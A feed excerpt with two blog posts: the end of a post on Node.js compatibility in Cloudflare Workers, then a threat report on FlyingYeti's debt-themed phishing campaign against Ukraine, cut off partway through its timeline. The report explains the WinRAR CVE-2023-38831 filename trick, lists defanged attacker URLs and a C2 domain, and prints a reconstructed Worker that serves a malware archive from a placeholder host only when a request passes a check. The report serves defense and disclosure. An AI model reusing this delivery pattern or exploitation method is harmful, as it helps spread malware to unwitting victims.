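    <p>As a concrete illustration (this sketch is ours, not code from the Cloudflare docs), a Worker like the following imports a Node.js API with a bare specifier, no <code>node:</code> prefix, which is exactly what <code>nodejs_compat_v2</code> enables:</p>
            <pre><code>// Sketch: a Worker that imports a Node.js API without the "node:" prefix.
import { EventEmitter } from 'events';

const worker = {
  async fetch(request) {
    // Use the Node-style EventEmitter while handling a request.
    const emitter = new EventEmitter();
    const seen = [];
    emitter.on('log', (msg) => seen.push(msg));
    emitter.emit('log', 'handled ' + new URL(request.url).pathname);
    return new Response(seen.join('\n'), { status: 200 });
  },
};

export default worker;</code></pre>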
    <div>
      <h3>Workerd is not Node.js</h3>
      <a href="#workerd-is-not-node-js">
        
      </a>
    </div>
    <p>To understand the latest changes, let’s start with a brief overview of how the Workers runtime differs from <a href="https://nodejs.org/"><u>Node.js</u></a>.</p><p>Node.js was built primarily for services run directly on a host OS and pioneered server-side JavaScript. Because of this, it includes functionality necessary to interact with the host machine, such as <a href="https://nodejs.org/api/process.html"><u>process</u></a> or <a href="https://nodejs.org/api/fs.html"><u>fs</u></a>, and a variety of utility modules, such as <a href="https://nodejs.org/api/crypto.html"><u>crypto</u></a>.</p><p>Cloudflare Workers run on an open source JavaScript/Wasm runtime called <a href="https://github.com/cloudflare/workerd"><u>workerd</u></a>. While both Node.js and workerd are built on <a href="https://v8.dev/"><u>V8</u></a>, workerd is <a href="https://blog.cloudflare.com/cloud-computing-without-containers"><u>designed to run untrusted code in shared processes</u></a>, exposes <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/"><u>bindings</u></a> for interoperability with other Cloudflare services, including <a href="https://blog.cloudflare.com/javascript-native-rpc"><u>JavaScript-native RPC</u></a>, and uses <a href="https://blog.cloudflare.com/introducing-the-wintercg"><u>web-standard APIs</u></a> whenever possible.</p><p>Cloudflare <a href="https://blog.cloudflare.com/introducing-the-wintercg/"><u>helped establish</u></a> <a href="https://wintercg.org/"><u>WinterCG</u></a>, the Web-interoperable Runtimes Community Group to improve interoperability of JavaScript runtimes, both with each other and with the web platform. You can build many applications using only web-standard APIs, but what about when you want to import dependencies from NPM that rely on Node.js APIs?</p><p>For example, if you attempt to import <a href="https://www.npmjs.com/package/pg"><u>pg</u></a>, a PostgreSQL driver, without Node.js compatibility turned on…</p>
            <pre><code>import pg from 'pg'</code></pre>
            <p>You will see the following error when you run <a href="https://developers.cloudflare.com/workers/wrangler/commands/#dev"><u>wrangler dev</u></a> to build your Worker:</p>
            <pre><code>✘ [ERROR] Could not resolve "events"
    ../node_modules/.pnpm/pg-cloudflare@1.1.1/node_modules/pg-cloudflare/dist/index.js:1:29:
      1 │ import { EventEmitter } from 'events';
        ╵                              ~~~~~~~~
  The package "events" wasn't found on the file system but is built into node.</code></pre>
            <p>This happens because the pg package imports the <a href="https://nodejs.org/api/events.html"><u>events module</u></a> from Node.js, which is not provided by workerd by default.</p><p>How can we enable this?</p>
    <div>
      <h3>Our first approach – build-time polyfills</h3>
      <a href="#our-first-approach-build-time-polyfills">
        
      </a>
    </div>
    <p>Polyfills are code that adds functionality to a runtime that does not natively support it. They are often added to provide modern JavaScript functionality to older browsers, but can be used for server-side runtimes as well.</p><p>In 2022, we <a href="https://github.com/cloudflare/workers-sdk/pull/869"><u>added functionality to Wrangler</u></a> that injected polyfill implementations of some Node.js APIs into your Worker if you set <code>node_compat = true</code> in your <code>wrangler.toml</code>. For instance, the following code would work with this flag, but not without:</p>
            <pre><code>import EventEmitter from 'events';
import { inherits } from 'util';</code></pre>
            <p>These polyfills are essentially just additional JavaScript code added to your Worker by <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a> when deploying the Worker. This behavior is enabled by <a href="https://www.npmjs.com/package/@esbuild-plugins/node-globals-polyfill"><code><u>@esbuild-plugins/node-globals-polyfill</u></code></a>, which itself uses <a href="https://github.com/ionic-team/rollup-plugin-node-polyfills/"><code><u>rollup-plugin-node-polyfills</u></code></a>.</p><p>This allows you to import and use some NPM packages, such as <code>pg</code>. However, many modules cannot be polyfilled with fast enough code or cannot be polyfilled at all.</p><p>For instance, <a href="https://nodejs.org/api/buffer.html"><u>Buffer</u></a> is a common Node.js API used to handle binary data. Polyfills exist for it, but JavaScript is often not optimized for the operations it performs under the hood, such as <code>copy</code>, <code>concat</code>, substring searches, or transcoding. While it is possible to implement Buffer in pure JavaScript, it could be far faster if the underlying runtime could use primitives from different languages. Similar limitations exist for other popular APIs such as <a href="https://nodejs.org/api/crypto.html"><u>Crypto</u></a>, <a href="https://nodejs.org/api/async_context.html"><u>AsyncLocalStorage</u></a>, and <a href="https://nodejs.org/api/stream.html"><u>Stream</u></a>.</p>
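    <p>To make the idea concrete, here is an illustrative, hypothetical sketch (ours, not actual Wrangler output) of the kind of JavaScript a polyfill injects: a bare-bones stand-in for the part of the events module that many packages depend on.</p>
            <pre><code>// Minimal, illustrative polyfill for a subset of Node's EventEmitter.
// Real polyfills (e.g. rollup-plugin-node-polyfills) are far more complete.
class MiniEventEmitter {
  constructor() {
    this.listeners = new Map();
  }
  on(event, fn) {
    if (!this.listeners.has(event)) this.listeners.set(event, []);
    this.listeners.get(event).push(fn);
    return this;
  }
  emit(event, ...args) {
    const fns = this.listeners.get(event) || [];
    for (const fn of fns) fn(...args);
    // Like Node, report whether any listener handled the event.
    return fns.length > 0;
  }
}</code></pre>
    <p>Because this is plain JavaScript, it bundles into any Worker; the catch, as described above, is that this approach hits a wall for APIs like Buffer, where performance depends on runtime-level primitives.</p>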
    <div>
      <h3>Our second approach – native support for some Node.js APIs in the Workers runtime</h3>
      <a href="#our-second-approach-native-support-for-some-node-js-apis-in-the-workers-runtime">
        
      </a>
    </div>
    <p>In 2023, we <a href="https://blog.cloudflare.com/workers-node-js-asynclocalstorage"><u>started adding</u></a> a subset of Node.js APIs directly to the Workers runtime. You can enable these APIs by adding the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>nodejs_compat compatibility flag</u></a> to your Worker, but you cannot combine this flag with the <code>node_compat = true</code> polyfills.</p><p>Also, when importing Node.js APIs, you must use the <code>node:</code> prefix:</p>
            <pre><code>import { Buffer } from 'node:buffer';</code></pre>
            <p>Since these Node.js APIs are built directly into the Workers runtime, they can be <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/buffer.c%2B%2B"><u>written in C++</u></a>, which allows them to be faster than JavaScript polyfills. APIs like <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/asynclocalstorage/"><u>AsyncLocalStorage</u></a>, which cannot be polyfilled without safety or performance issues, can be provided natively.</p><p>Requiring the <code>node:</code> prefix makes imports more explicit and aligns with modern Node.js conventions. Unfortunately, existing NPM packages may import modules without the <code>node:</code> prefix. For instance, revisiting the example above, if you import the popular package <code>pg</code> in a Worker with the <code>nodejs_compat</code> flag, you still see the following error:</p>
            <pre><code>✘ [ERROR] Could not resolve "events"
    ../node_modules/.pnpm/pg-cloudflare@1.1.1/node_modules/pg-cloudflare/dist/index.js:1:29:
      1 │ import { EventEmitter } from 'events';
        ╵                              ~~~~~~~~
  The package "events" wasn't found on the file system but is built into node.</code></pre>
            <p>Many NPM packages still didn’t work in Workers, even if you enabled the <code>nodejs_compat</code> compatibility flag. You had to choose between a smaller set of performant APIs, exposed in a way that many NPM packages couldn’t access, or a larger set of incomplete and less performant APIs. And APIs like <code>process</code>, which are exposed as globals in Node.js, could still only be accessed by importing them as modules.</p>
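            <p>For example, the only way to reach <code>process</code> in a Worker under this model was an explicit module import (the same import also works in Node.js itself):</p>
            <pre><code>// process is not available as a global here; it only exists via this import
import process from 'node:process';

console.log(typeof process.env); // "object"</code></pre>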
    <div>
      <h3>The new approach: a hybrid model</h3>
      <a href="#the-new-approach-a-hybrid-model">
        
      </a>
    </div>
    <p>What if we could have the best of both worlds, and it just worked?</p><ul><li><p>A subset of Node.js APIs implemented directly in the Workers runtime</p></li><li><p>Polyfills for the majority of other Node.js APIs</p></li><li><p>No <code>node:</code> prefix required</p></li><li><p>One simple way to opt in</p></li></ul><p>Improved Node.js compatibility does just that.</p><p>Let’s take a look at two lines of code that look similar, but now act differently under the hood when <code>nodejs_compat_v2</code> is enabled:</p>
            <pre><code>import { Buffer } from 'buffer';  // natively implemented
import { isIP } from 'net'; // polyfilled</code></pre>
            <p>The first line imports <code>Buffer</code> from a <a href="https://github.com/cloudflare/workerd/blob/main/src/node/internal/internal_buffer.ts"><u>JavaScript module</u></a> in workerd that is backed by <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/buffer.c%2B%2B"><code><u>C++ code</u></code></a>. Various other Node.js modules are similarly implemented in a combination of TypeScript and C++, including <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/async-hooks.h"><code><u>AsyncLocalStorage</u></code></a> and <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/crypto.h"><code><u>Crypto</u></code></a>. This allows for highly performant code that matches Node.js behavior.</p><p>Note that the <code>node:</code> prefix is not needed when importing <code>buffer</code>, but the code would also work with <code>node:buffer</code>.</p><p>The second line imports <code>net</code>, which Wrangler automatically polyfills using a library called <a href="https://github.com/unjs/unenv"><u>unenv</u></a>. Polyfills and built-in runtime APIs now work together.</p><p>Previously, when you set <code>node_compat = true</code>, Wrangler added polyfills for every Node.js API that it was able to, even if neither your Worker nor its dependencies used that API. When you enable the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>nodejs_compat_v2 compatibility flag</u></a>, Wrangler only adds polyfills for Node.js APIs that your Worker or its dependencies actually use. This results in smaller Worker sizes, even with polyfills.</p><p>For some Node.js APIs, there is not yet native support in the Workers runtime, nor a polyfill implementation. In these cases, unenv “mocks” the interface: it adds the module and its methods to your Worker, but calling those methods will either do nothing or throw an error with a message like:</p><p><code>[unenv] &lt;method name&gt; is not implemented yet!</code></p><p>This is more important than it might seem: if a Node.js API is “mocked”, NPM packages that depend on it can still be imported. Consider the following code:</p>
            <pre><code>// Package name: my-module

import fs from "fs";

export function foo(path) {
  const data = fs.readFileSync(path, 'utf8');
  return data;
}

export function bar() {
  return "baz";
}
</code></pre>
            
            <pre><code>import { bar } from "my-module"

bar(); // returns "baz"
foo(); // throws readFileSync is not implemented yet!
</code></pre>
            <p>Previously, even with the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>existing nodejs_compat compatibility flag</u></a> enabled, attempting to import <code>my-module</code> would fail at build time, because the <code>fs</code> module could not be resolved. Now, the <code>fs</code> module can be resolved, methods that do not rely on an unimplemented Node.js API work, and methods that do rely on one throw a more specific error – a runtime error that a specific Node.js API method is not yet supported, rather than a build-time error that the module could not be resolved.</p><p>This is what enables some packages to transition from “doesn’t even load on Workers” to “loads, but with some unsupported methods”.</p>
    <div>
      <h3>Still missing an API from Node.js? Module aliasing to the rescue</h3>
      <a href="#still-missing-an-api-from-node-js-module-aliasing-to-the-rescue">
        
      </a>
    </div>
    <p>Let’s say you need an NPM package that relies on a Node.js API not yet implemented in the Workers runtime or polyfilled by unenv. You can use <a href="https://developers.cloudflare.com/workers/wrangler/configuration/#module-aliasing"><u>module aliasing</u></a> to implement just enough of that API to make things work.</p><p>For example, let’s say the NPM package you need calls <a href="https://nodejs.org/api/fs.html#fsreadfilepath-options-callback"><u>fs.readFile</u></a>. You can alias the <code>fs</code> module by adding the following to your Worker’s <code>wrangler.toml</code>:</p>
            <pre><code>[alias]
"fs" = "./fs-polyfill"</code></pre>
            <p>Then, in the <code>fs-polyfill.js</code> file, you can define your own implementation of any methods of the <code>fs</code> module:</p>
            <pre><code>export function readFile() {
  console.log("readFile was called");
  // ...
}
</code></pre>
            <p>Now, the following code, which previously threw the error message “[unenv] readFile is not implemented yet!”, runs without errors:</p>
            <pre><code>import { readFile } from 'fs';

export default {
  async fetch(request, env, ctx) {
    readFile();
    return new Response('Hello World!');
  },
};
</code></pre>
            <p>You can also use module aliasing to provide an implementation of an NPM package that does not work on Workers, even if you only rely on that NPM package indirectly, as a dependency of one of your Worker's dependencies.</p><p>For example, some NPM packages, such as <a href="https://www.npmjs.com/package/cross-fetch"><u>cross-fetch</u></a>, depend on <a href="https://www.npmjs.com/package/node-fetch"><u>node-fetch</u></a>, a package that provided a polyfill of the <a href="https://developers.cloudflare.com/workers/runtime-apis/fetch/"><u>fetch() API</u></a> before it was built into Node.js. The node-fetch package isn't needed in Workers, because the fetch() API is provided by the Workers runtime. And node-fetch doesn't work on Workers, because it relies on currently unsupported Node.js APIs from the <a href="https://nodejs.org/api/http.html"><u>http</u></a> and <a href="https://nodejs.org/api/https.html"><u>https</u></a> modules.</p><p>You can alias all imports of node-fetch to instead point directly to the fetch() API that is built into the Workers runtime using the popular <a href="https://github.com/SukkaW/nolyfill"><u>nolyfill</u></a> package:</p>
            <pre><code>[alias]
"node-fetch" = "./fetch-nolyfill"</code></pre>
            <p>All your replacement module needs to do in this case is to re-export the fetch API that is built into the Workers runtime:</p>
            <pre><code>export default fetch;</code></pre>
            
    <div>
      <h3>Contributing back to unenv</h3>
      <a href="#contributing-back-to-unenv">
        
      </a>
    </div>
    <p>Cloudflare is actively contributing to unenv. We think unenv is solving the problem of cross-runtime compatibility the right way — it adds only the necessary polyfills to your application, based on what APIs you use and what runtime you target. The project supports a variety of runtimes beyond workerd and is already used by other popular projects including <a href="https://nuxt.com/"><u>Nuxt</u></a> and <a href="https://nitro.unjs.io/"><u>Nitro</u></a>. We want to thank <a href="https://github.com/pi0"><u>Pooya Parsa</u></a> and the unenv maintainers and encourage others in the ecosystem to adopt or contribute.</p>
    <div>
      <h3>The path forward</h3>
      <a href="#the-path-forward">
        
      </a>
    </div>
    <p>Currently, you can enable improved Node.js compatibility by setting the <code>nodejs_compat_v2</code> flag in <code>wrangler.toml</code>. On September 23rd, we plan to make the new behavior the default when using the <code>nodejs_compat</code> flag. This will require updating your <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/"><code><u>compatibility_date</u></code></a>.</p><p>We are excited about the changes coming to Node.js compatibility, and encourage you to try them today. <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>See the documentation</u></a> on how to opt in for your Workers, and please send feedback and report bugs <a href="https://github.com/cloudflare/workers-sdk/issues/new?assignees=&amp;labels=bug&amp;projects=&amp;template=bug-template.yaml&amp;title=%F0%9F%90%9B+BUG%3A"><u>by opening an issue</u></a>. Doing so will help us identify any gaps in support and ensure that as much of the Node.js ecosystem as possible runs on Workers.</p>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[JavaScript]]></category>
            <guid isPermaLink="false">3zICVbgdxrLByG4g2Dsddy</guid>
            <dc:creator>James M Snell</dc:creator>
            <dc:creator>Igor Minar</dc:creator>
            <dc:creator>James Culveyhouse</dc:creator>
            <dc:creator>Mike Nomitch</dc:creator>
        </item>
        <item>
            <title><![CDATA[Disrupting FlyingYeti's campaign targeting Ukraine]]></title>
            <link>https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine/</link>
            <pubDate>Thu, 30 May 2024 13:00:38 GMT</pubDate>
            <description><![CDATA[ In April and May 2024, Cloudforce One employed proactive defense measures to successfully prevent Russia-aligned threat actor FlyingYeti from launching their latest phishing campaign targeting Ukraine ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudforce One is publishing the results of our investigation and real-time effort to detect, deny, degrade, disrupt, and delay threat activity by the Russia-aligned threat actor FlyingYeti during their latest phishing campaign targeting Ukraine. At the onset of Russia’s invasion of Ukraine on February 24, 2022, Ukraine introduced a moratorium on evictions and termination of utility services for unpaid debt. The moratorium ended in January 2024, resulting in significant debt liability and increased financial stress for Ukrainian citizens. The FlyingYeti campaign capitalized on anxiety over the potential loss of access to housing and utilities by enticing targets to open malicious files via debt-themed lures. If opened, the files would result in infection with the PowerShell malware known as <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">COOKBOX</a>, allowing FlyingYeti to support follow-on objectives, such as installation of additional payloads and control over the victim’s system.</p><p>Since April 26, 2024, Cloudforce One has taken measures to prevent FlyingYeti from launching their phishing campaign – a campaign involving the use of Cloudflare Workers and GitHub, as well as exploitation of the WinRAR vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831">CVE-2023-38831</a>. Our countermeasures included internal actions, such as detections and code takedowns, as well as external collaboration with third parties to remove the actor’s cloud-hosted malware. Our effectiveness against this actor prolonged their operational timeline from days to weeks. For example, in a single instance, FlyingYeti spent almost eight hours debugging their code as a result of our mitigations. By employing proactive defense measures, we successfully stopped this determined threat actor from achieving their objectives.</p>
    <div>
      <h3>Executive Summary</h3>
      <a href="#executive-summary">
        
      </a>
    </div>
    <ul><li><p>On April 18, 2024, Cloudforce One detected the Russia-aligned threat actor FlyingYeti preparing to launch a phishing espionage campaign targeting individuals in Ukraine.</p></li><li><p>We discovered the actor used tactics, techniques, and procedures (TTPs) similar to those detailed in <a href="https://cert.gov.ua/article/6278620">Ukrainian CERT's article on UAC-0149</a>, a threat group that has primarily <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">targeted Ukrainian defense entities with COOKBOX malware since at least the fall of 2023</a>.</p></li><li><p>From mid-April to mid-May, we observed FlyingYeti conduct reconnaissance activity, create lure content for use in their phishing campaign, and develop various iterations of their malware. We assessed that the threat actor intended to launch their campaign in early May, likely following Orthodox Easter.</p></li><li><p>After several weeks of monitoring actor reconnaissance and weaponization activity (<a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html">Cyber Kill Chain Stages 1 and 2</a>), we successfully disrupted FlyingYeti’s operation moments after the final COOKBOX payload was built.</p></li><li><p>The payload included an exploit for the WinRAR vulnerability CVE-2023-38831, which FlyingYeti will likely continue to use in their phishing campaigns to infect targets with malware.</p></li><li><p>We offer steps users can take to defend themselves against FlyingYeti phishing operations, and also provide recommendations, detections, and indicators of compromise.</p></li></ul>
    <div>
      <h2>Who is FlyingYeti?</h2>
      <a href="#who-is-flyingyeti">
        
      </a>
    </div>
    <p>FlyingYeti is the <a href="https://www.merriam-webster.com/dictionary/cryptonym">cryptonym</a> given by <a href="/introducing-cloudforce-one-threat-operations-and-threat-research">Cloudforce One</a> to the threat group behind this phishing campaign, which overlaps with UAC-0149 activity tracked by <a href="https://cert.gov.ua/">CERT-UA</a> in <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">February</a> and <a href="https://cert.gov.ua/article/6278620">April</a> 2024. The threat actor uses dynamic DNS (<a href="https://www.cloudflare.com/learning/dns/glossary/dynamic-dns/">DDNS</a>) for their infrastructure and leverages cloud-based platforms for hosting malicious content and for malware command and control (C2). Our investigation of FlyingYeti TTPs suggests this is likely a Russia-aligned threat group. The actor appears to primarily focus on targeting Ukrainian military entities. Additionally, we observed Russian-language comments in FlyingYeti’s code, and the actor’s operational hours falling within the UTC+3 time zone.</p>
    <div>
      <h2>Campaign background</h2>
      <a href="#campaign-background">
        
      </a>
    </div>
    <p>In the days leading up to the start of the campaign, Cloudforce One observed FlyingYeti conducting reconnaissance on payment processes for Ukrainian communal housing and utility services:</p><ul><li><p>April 22, 2024 – research into changes made in 2016 that introduced the use of QR codes in payment notices</p></li><li><p>April 22, 2024 – research on current developments concerning housing and utility debt in Ukraine</p></li><li><p>April 25, 2024 – research on the legal basis for restructuring housing debt in Ukraine as well as debt involving utilities, such as gas and electricity</p></li></ul><p>Cloudforce One judges that the observed reconnaissance is likely due to the Ukrainian government’s payment moratorium introduced at the start of the full-fledged invasion in February 2022. Under this moratorium, outstanding debt would not lead to evictions or termination of provision of utility services. However, on January 9, 2024, the <a href="https://en.interfax.com.ua/news/economic/959388.html">government lifted this ban</a>, resulting in increased pressure on Ukrainian citizens with outstanding debt. FlyingYeti sought to capitalize on that pressure, leveraging debt restructuring and payment-related lures in an attempt to increase their chances of successfully targeting Ukrainian individuals.</p>
    <div>
      <h2>Analysis of the Komunalka-themed phishing site</h2>
      <a href="#analysis-of-the-komunalka-themed-phishing-site">
        
      </a>
    </div>
    <p>The disrupted phishing campaign would have directed FlyingYeti targets to an actor-controlled GitHub page at hxxps[:]//komunalka[.]github[.]io, which is a spoofed version of the Kyiv Komunalka communal housing site <a href="https://www.komunalka.ua">https://www.komunalka.ua</a>. Komunalka functions as a payment processor for residents in the Kyiv region and allows for payment of utilities, such as gas, electricity, telephone, and Internet. Additionally, users can pay other fees and fines, and even donate to Ukraine’s defense forces.</p><p>Based on past FlyingYeti operations, targets may be directed to the actor’s Github page via a link in a phishing email or an encrypted Signal message. If a target accesses the spoofed Komunalka platform at hxxps[:]//komunalka[.]github[.]io, the page displays a large green button with a prompt to download the document “Рахунок.docx” (“Invoice.docx”), as shown in Figure 1. This button masquerades as a link to an overdue payment invoice but actually results in the download of the malicious archive “Заборгованість по ЖКП.rar” (“Debt for housing and utility services.rar”).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/22Rnm7YOnwnJocG98RMFDa/def10039081f7e9c6df15980a8b855ac/image4-5.png" />
            
            </figure><p>Figure 1: Prompt to download malicious archive “Заборгованість по ЖКП.rar”</p><p>A series of steps must take place for the download to successfully occur:</p><ul><li><p>The target clicks the green button on the actor’s GitHub page hxxps[:]//komunalka.github[.]io</p></li><li><p>The target’s device sends an HTTP POST request to the Cloudflare Worker worker-polished-union-f396[.]vqu89698[.]workers[.]dev with the HTTP request body set to “user=Iahhdr”</p></li><li><p>The Cloudflare Worker processes the request and evaluates the HTTP request body</p></li><li><p>If the request conditions are met, the Worker fetches the RAR file from hxxps[:]//raw[.]githubusercontent[.]com/kudoc8989/project/main/Заборгованість по ЖКП.rar, which is then downloaded on the target’s device</p></li></ul><p>Cloudforce One identified the infrastructure responsible for facilitating the download of the malicious RAR file and remediated the actor-associated Worker, preventing FlyingYeti from delivering its malicious tooling. In an effort to circumvent Cloudforce One's mitigation measures, FlyingYeti later changed their malware delivery method. Instead of the Workers domain fetching the malicious RAR file, it was loaded directly from GitHub.</p>
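            <p>To make the gating behavior concrete, here is a hypothetical sketch of a Worker following the pattern described above – this is illustrative code written by us, not the actor’s actual Worker, and the payload URL is a placeholder rather than the real hosting location:</p>
            <pre><code>// Hypothetical reconstruction of the delivery-gating pattern (illustrative only)
const PAYLOAD_URL = 'https://example.invalid/payload.rar'; // placeholder

// The gate: only a POST whose body carries the expected marker is served
export function shouldServePayload(method, body) {
  if (method !== 'POST') return false;
  return body === 'user=Iahhdr';
}

export default {
  async fetch(request) {
    const body = await request.text();
    if (!shouldServePayload(request.method, body)) {
      return new Response('Not Found', { status: 404 });
    }
    // Proxy the archive from its hosting location back to the visitor
    const upstream = await fetch(PAYLOAD_URL);
    return new Response(upstream.body, { status: upstream.status });
  },
};</code></pre>
            <p>Gating delivery this way keeps the payload URL out of the phishing page’s source and lets the operator refuse requests that do not originate from the expected click path.</p>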
    <div>
      <h2>Analysis of the malicious RAR file</h2>
      <a href="#analysis-of-the-malicious-rar-file">
        
      </a>
    </div>
    <p>During remediation, Cloudforce One recovered the RAR file “Заборгованість по ЖКП.rar” and performed analysis of the malicious payload. The downloaded RAR archive contains multiple files, including a file with a name that contains the unicode character “U+201F”. This character appears as whitespace on Windows devices and can be used to “hide” file extensions by adding excessive whitespace between the filename and the file extension. As highlighted in blue in Figure 2, this cleverly named file within the RAR archive appears to be a PDF document but is actually a malicious CMD file (“Рахунок на оплату.pdf[unicode character U+201F].cmd”).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55Vjmg9VLEnAFv3RZQoZ2l/866016a2489f2a6c780c9f3971dd28ca/image2-11.png" />
            
            </figure><p>Figure 2: Files contained in the malicious RAR archive “Заборгованість по ЖКП.rar” (“Housing Debt.rar”)</p><p>FlyingYeti included a benign PDF in the archive with the same name as the CMD file but without the unicode character, “Рахунок на оплату.pdf” (“Invoice for payment.pdf”). Additionally, the directory name for the archive once decompressed also contained the name “Рахунок на оплату.pdf”. This overlap in names of the benign PDF and the directory allows the actor to exploit the WinRAR vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831">CVE-2023-38831</a>. More specifically, when an archive includes a benign file with the same name as the directory, the entire contents of the directory are opened by the WinRAR application, resulting in the execution of the malicious CMD. In other words, when the target believes they are opening the benign PDF “Рахунок на оплату.pdf”, the malicious CMD file is executed.</p><p>The CMD file contains the FlyingYeti PowerShell malware known as <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">COOKBOX</a>. The malware is designed to persist on a host, serving as a foothold in the infected device. Once installed, this variant of COOKBOX will make requests to the DDNS domain postdock[.]serveftp[.]com for C2, awaiting PowerShell <a href="https://learn.microsoft.com/en-us/powershell/scripting/powershell-commands?view=powershell-7.4">cmdlets</a> that the malware will subsequently run.</p><p>Alongside COOKBOX, several decoy documents are opened, which contain hidden tracking links using the <a href="https://canarytokens.com/generate">Canary Tokens</a> service. The first document, shown in Figure 3 below, poses as an agreement under which debt for housing and utility services will be restructured.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20vFV9kNTMmwxFXvpQoJTc/12542fb7a7d2108d49607f2a23fc7575/image5-10.png" />
            
            </figure><p>Figure 3: Decoy document Реструктуризація боргу за житлово комунальні послуги.docx</p><p>The second document (Figure 4) is a user agreement outlining the terms and conditions for the usage of the payment platform komunalka[.]ua.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1VHSTwqfrXWXvoryg8lOcE/68eb096bc82f18c7edcb4c88c1ed6d2c/image3-6.png" />
            
            </figure><p>Figure 4: Decoy document Угода користувача.docx <i>(User Agreement.docx)</i></p><p>The use of relevant decoy documents as part of the phishing and delivery activity is likely an effort by FlyingYeti operators to increase the appearance of legitimacy of their activities.</p><p>The phishing theme we identified in this campaign is likely one of many themes leveraged by this actor in a larger operation to target Ukrainian entities, in particular their defense forces. In fact, the threat activity we detailed in this blog uses many of the same techniques outlined in a <a href="https://cert.gov.ua/article/6278620">recent FlyingYeti campaign</a> disclosed by CERT-UA in mid-April 2024, where the actor leveraged United Nations-themed lures involving Peace Support Operations to target Ukraine’s military. Due to Cloudforce One’s defensive actions covered in the next section, this latest FlyingYeti campaign was prevented as of the time of publication.</p>
    <div>
      <h2>Mitigating FlyingYeti activity</h2>
      <a href="#mitigating-flyingyeti-activity">
        
      </a>
    </div>
    <p>Cloudforce One mitigated FlyingYeti’s campaign through a series of actions. Each action was taken to increase the actor’s cost of continuing their operations. When assessing which action to take and why, we carefully weighed the pros and cons in order to provide an effective active defense strategy against this actor. Our general goal was to increase the amount of time the threat actor spent trying to develop and weaponize their campaign.</p><p>We were able to successfully extend the timeline of the threat actor’s operations from hours to weeks. At each interdiction point, we assessed the impact of our mitigation to ensure the actor would spend more time attempting to launch their campaign. Our mitigation measures disrupted the actor’s activity, in one instance resulting in eight additional hours spent on debugging code.</p><p>Due to our proactive defense efforts, FlyingYeti operators adapted their tactics multiple times in their attempts to launch the campaign. The actor originally intended to have the Cloudflare Worker fetch the malicious RAR file from GitHub. After Cloudforce One’s interdiction of the Worker, the actor attempted to create additional Workers via a new account. In response, we disabled all Workers, leading the actor to load the RAR file directly from GitHub. Cloudforce One notified GitHub, resulting in the takedown of the RAR file, the GitHub project, and suspension of the account used to host the RAR file. 
In turn, FlyingYeti began testing the option to host the RAR file on the file sharing sites <a href="https://pixeldrain.com/">pixeldrain</a> and <a href="https://www.filemail.com/">Filemail</a>, where we observed the actor alternating the link on the Komunalka phishing site between the following:</p><ul><li><p>hxxps://pixeldrain[.]com/api/file/ZAJxwFFX?download=one</p></li><li><p>hxxps://1014.filemail[.]com/api/file/get?filekey=e_8S1HEnM5Rzhy_jpN6nL-GF4UAP533VrXzgXjxH1GzbVQZvmpFzrFA&amp;pk_vid=a3d82455433c8ad11715865826cf18f6</p></li></ul><p>We notified GitHub of the actor’s evolving tactics, and in response GitHub removed the Komunalka phishing site. After analyzing the files hosted on pixeldrain and Filemail, we determined the actor uploaded dummy payloads, likely to monitor access to their phishing infrastructure (FileMail logs IP addresses, and both file hosting sites provide view and download counts). At the time of publication, we did not observe FlyingYeti upload the malicious RAR file to either file hosting site, nor did we identify the use of alternative phishing or malware delivery methods.</p><p>A timeline of FlyingYeti’s activity and our corresponding mitigations can be found below.</p>
    <div>
      <h3>Event timeline</h3>
      <a href="#event-timeline">
        
      </a>
    </div>
    
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Date</span></th>
    <th><span>Event Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>2024-04-18 12:18</span></td>
    <td><span>Threat Actor (TA) creates a Worker to handle requests from a phishing site</span></td>
  </tr>
  <tr>
    <td><span>2024-04-18 14:16</span></td>
    <td><span>TA creates phishing site komunalka[.]github[.]io on GitHub</span></td>
  </tr>
  <tr>
    <td><span>2024-04-25 12:25</span></td>
    <td><span>TA creates a GitHub repo to host a RAR file</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 07:46</span></td>
    <td><span>TA updates the first Worker to handle requests from users visiting komunalka[.]github[.]io</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 08:24</span></td>
    <td><span>TA uploads a benign test RAR to the GitHub repo</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 13:38</span></td>
    <td><span>Cloudforce One identifies a Worker receiving requests from users visiting komunalka[.]github[.]io, observes its use as a phishing page</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 13:46</span></td>
    <td><span>Cloudforce One identifies that the Worker fetches a RAR file from GitHub (the malicious RAR payload is not yet hosted on the site)</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 19:22</span></td>
